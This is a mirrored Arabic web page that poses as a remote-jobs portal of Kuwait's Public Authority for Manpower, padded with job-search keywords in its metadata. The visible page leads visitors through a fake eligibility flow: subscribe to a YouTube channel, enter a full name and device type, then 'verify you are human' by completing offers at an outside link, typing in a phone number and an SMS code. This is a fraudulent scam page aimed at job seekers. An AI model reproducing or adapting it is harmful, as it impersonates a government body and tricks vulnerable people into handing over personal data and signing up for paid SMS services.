<!DOCTYPE html>
<html dir="rtl" lang="ar" class="notranslate" translate="no">


<!-- Mirrored from pub50.us/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Nov 2020 16:23:33 GMT -->

<!-- Mirrored from jobs.nebrasalalom.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 05 Dec 2020 12:25:30 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-15270644468-13"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-15270644468-13');
</script>
<title>العمل عن بعد | الهيئة العامة للقوى العاملة لدولة الكويت</title>
<meta name="google" content="notranslate" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<link rel="icon" href="img/favicon.png" type="image/x-icon" sizes="16x16" />
<meta name="description" content="اأعلنت وزارة الموارد البشرية (بوابة العمل عن بعد) عن توفر عدة وظائف متنوعة للرجال والنساء في مختلف المناطق (لحملة كافة المؤهلات)، وهي وظائف مناسبة لمن يواجهون حواجز تعرقل دخولهم لسوق العمل بسبب (المواصلات، البعد الجغرافي) أو الراغبين في العمل بمرونة أكثر وأسهل لللجميع:
مجموعة (جديدة) من الوظائف (عن بعد)
 مساعد إداري.
 ضابط توثيق الصادر.
 مندوب مبيعات.
 موظف تسويق إلكتروني.
كاتبة إدخال بيانات.
كاتب استعلامات عامة.
كاتب توظيف.
مأمور سنترال
مندوب مشتريات .مدخلة بيانات .
مندوب مشتريات .اختصاصي تسويق.كاتب دوام.مندوب مبيعات عن بعد كاتب إداري.
كاتب مالية.محاسب عام عن بعدnمسوقه.
في التسويق.مساعدة اداريه .خدمة عملاء .مساعدة محاسب.
إدخال بيانات و تنسيق إداري ادارة حسابات التواصل .مترجم.
كاتب اداري .كاتبة ادخال بيانات
طريقة التقديم زيارة بوابة العمل عن بعد.
اضغط على ايقونة التسجيل (خيار الباحث عن عمل).أنشئ حسابك الإلكتروني في البوابة.عند إنشاء الحساب قم ببناء أو تحميل سيرتك الذاتية.عند الانتهاء من السيرة الذاتية سيظهر لك ملفك التعريفي ويمكنك التقديم على الوظائف المتاحة. صحيح
" />

<meta property="og:title" content=" وزارة العمل و التنمية الاجتماعية: العمل عن بعد" /> 
<meta property="og:description" content="اليوم 
فقد أنشأت الهيئة العامة للقوى العاملة وفق القانون رقم 109 لسنة 2013 ، واعتبارها هيئة عامة ذات شخصية اعتبارية وميزانية ملحقة يشرف عليها وزير الدولة للشئون الاقتصادية. وتتولى الهيئة الإختصاصات المقررة في القانون رقم 28 لسنة 1968 في شأن العمل في قطاع الأعمال النفطية والقانون رقم 6 لسنة 2010 في شأن العمل في القطاع الأهلي والقانون رقم 68 لسنة 2015 في شأن العمالة المنزلية، ويكون للهيئة مجلس إدارة يشكل برئاسة الوزير وعضوية كل من مدير عام الهيئة العامة للقوى العاملة نائبا للرئيس وأربعة أعضاء من الجهات الحكومية يكون تعيينهم بمرسوم بناء على ترشيح الوزير على أن لاتقل درجة كل منهم عن وكيل وزارة مساعد وثلاثة من ذوي الخبرة

تشرف الهيئة العامة للقوى العاملة على القطاعين الأهلي والنفطي من خلال وضع الأسس والقواعد والإجراءات اللازمة ولها صلاحية إصدار اللوائح الخاصة بقواعد وإجراءات منح الإذن بالعمل وتقدير الاحتياج العمالي وكيفية انتقال الأيدي العاملة من صاحب عمل لآخر، ويكون لمفتشي الهيئة صفة الضبطية القضائية. وتختص الهيئة العامة للقوى العاملة منفردة باستقدام العمالة الوافدة في القطاعين الأهلي والنفطي بناء على طلب صاحب العمل بالإضافة إلى تحديد وتحصيل الرسوم وأجور الخدمات التي تقدمها . كما تختص أيضًا بتحديد إجراءات تأسيس النقابات العمالية واتحادات أصحاب الأعمال وبيان المستندات والأوراق اللازمة لإشهارها على ضوء قانون العمل بالقطاع الأهلي رقم 6/2010 والقرارات المنظمة له. وبصدور قرار مجلس الوزراء رقم 875 لسنة 2017 بنقل تبعية واختصاصات برنامج إعادة هيكلة القوى العاملة والجهاز التنفيذي بالدولة إلى الهيئة، أصبح لها كافة الاختصاصات المتعلقة بتنمية العمالة الوطنية وتوجيهها نحو العمل بالجهات غير الحكومية، وما تتضمنه من خدمات تسجيل العمالة الوطنية وصرف المزايا المالية لها.

وحرصا من الهيئة على حقوق وإلتزامات أصحاب الأعمال والعمالة طبقا لأحكام القانون وإشرافها على تسوية المنازعات التي قد تنشأ بين أصحاب الأعمال والعمالة المستقدمة، فقد تم توفيرحسابات على وسائل التواصل الاجتماعي لتلقي البلاغات والشكاوى بصفة عامة، بما فيها جرائم الاتجار بالأشخاص لتوعية المواطنين والمقيمين بتداعياتها وخطورتها وذلك على العناوين الالكترونية التالية:


الموقع الالكتروني للهيئة العامة للقوى العاملة
Twitter
Manpowerkwt
Instagram
البريد الالكتروني : pr@manpower.gov.kw
69009600
مطلوب سيدات للعمل من المنزل الكويت
مدخل بيانات من المنزل الكويت
وظائف اون لاين من المنزل
وظيفة من المنزل براتب شهري في الكويت
وظائف الكويت أون لاين
افضل الوظائف في الكويت
وظائف القطاع الخاص بالكويت
وظائف الكويت الحكومية
فرص عمل بالخارج بتاريخ اليوم
وظائف في الكويت الوسيط
شغل بالكويت للمصريين
وظائف للمقيمين في الكويت
وظائف للسعوديين في الكويت
وظائف سائقين بالكويت 2020
وظائف فنادق الكويت
وظائف على النت من المنزل
ابحث عن عمل في الكويت سائق
مطلوب للعمل في الكويت
مميزات العمل في الكويت
وظائف للبدون 2019
وظائف عسكرية الكويت
وظائف في الكويت مع الراتب
المهن المطلوبة للعمل بالكويت
وظائف خالية في الكويت سائقين مصريين
وظائف في هايبر ماركت بالكويت
فرص عمل للسودانيين في سلطنة عمان
وظائف في الكويت للمقيمين في مصر
فرص عمل في الكويت 2019
تنقيب الكويت
جريدة الكويت اليوم
وظائف السوق المفتوح الكويت
وظائف خالية بالكويت بدون مؤهل
الوسيط الكويت وظائف سائقين
جريدة الوسيط الكويت 2020

 و  
" />
<meta name="keywords" content="وظائف الكويت, العمل عن بعد ,وظائف عن بعد للنساءالبحث عن وظائف عن بعد
" />
<style>
		.backgrnd img{
			max-width: 100%;
		}
	</style>
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<div class="backgrnd">
<img src="img/bg.png" />
</div>
<br><br>
<div class="main-question">
<h1 id="mainQuest">هل أنت هنا من أجل وظائف العمل عن بعد ؟</h1>
<br>
<button id="mainBtn" onclick="nextPage('page1')">نعم</button>
</div>
<div id="progbars">
<img id="steps_progress" src="img/progress_1.png" />
</div>
<div id="quest-container">
<span id="quest_label"></span>
<h2 id="question"></h2>
<div class="buttons">
<div id="btn0"><span id="choice0"></span></div>
<div id="btn1"><span id="choice1"></span></div>
<div id="btn2"><span id="choice2"></span></div>
<div id="btn3"><span id="choice3"></span></div>
</div>
</div>
<div id="channel-step">
<p class="has-text-align-center" style="text-align: center;">اختر قناة من القنوات وقم&nbsp;<strong>بمتابعتها</strong>&nbsp;و&nbsp;<strong>تفعيل الجرس</strong></p>
<a href="https://www.youtube.com/channel/UCuz8G2Lt9QJFQcQLR9FnvrQ?sub_confirmation=1" target="_self">
<img src="img/youtube_btn.png" />
</a>
<br><br><br>
<button id="btn_subscribed" onclick="nextPage('page4')">تم الاشتراك</button>
</div>
<div id="account-step">
<h3> أدخل اسمك الثلاثي :</h3>
<input type="text" id="account-username" class="generator-input account-input" placeholder="اسمك الثلاثي هنا..." autocomplete="off" autofocus="on">
<h3> اختر نوع الجهاز التي ستعمل عليها:</h3>
<select id="device-type">
<option>Android</option>
<option>Iphone - iOS</option>
<option>Windows - PC</option>
</select>
<br><br><br>
<button id="btn_generate" onclick="nextPage('page5')">تحقق</button>
</div>
<div id="loader">
<img src="img/verify.gif" width="130px" height="130px" />
<h3>اجراء التحقق..</h3>
</div>
<div id="final-step">
<img src="img/done.png" />
<h3>ممتاز! أنت الأن مأهل للخطوة الأخيرة. الخطوة النهائية قبل تحديد موعد مقابلة العمل
قبل أن نرسلك الى صفحة مقابل العمل و تحديد الراتب  نحتاج إلى التحقق من أنك بشري و لست روبوتاً, بعد ما يتم التحقق من حسابك سيتم عرض الوظائف التي تناسبك اختر احدى الوظائف و سيتواصل معاك خدمة العملاء لتحديد بدء العمل خدمة العملاء متواجدة 24 ساعة طوال ايام الاسبوع . للتحقق من حسابك اتبع الخطوات الخطوة 1: انقر فوق "التحقق الآن!" الخطوة 2: عند الضغط على التحقق الأن ستظهر لك قائمة من العروض! قم بأكمال أحد العروض من القائمة كيف! قم بالضغط على أي عرض من القائمة سيفتتح لك العرض ضع رقمك الهاتف داخل العرض سيصلك كود برساله قم بوضع الكود في خانة العرض وستنتهي من أكمال العرض

</h3>
<br>
<button id="btn_offers" onclick="window.location.href='https://dwnlds.co/ce77ece';">التحقق الأن</button>
</div>
<script src="js/main.js" type="text/javascript"></script>
</body>



<!-- Mirrored from pub50.us/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 16 Nov 2020 16:24:26 GMT -->

<!-- Mirrored from jobs.nebrasalalom.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 05 Dec 2020 12:25:34 GMT -->
</html>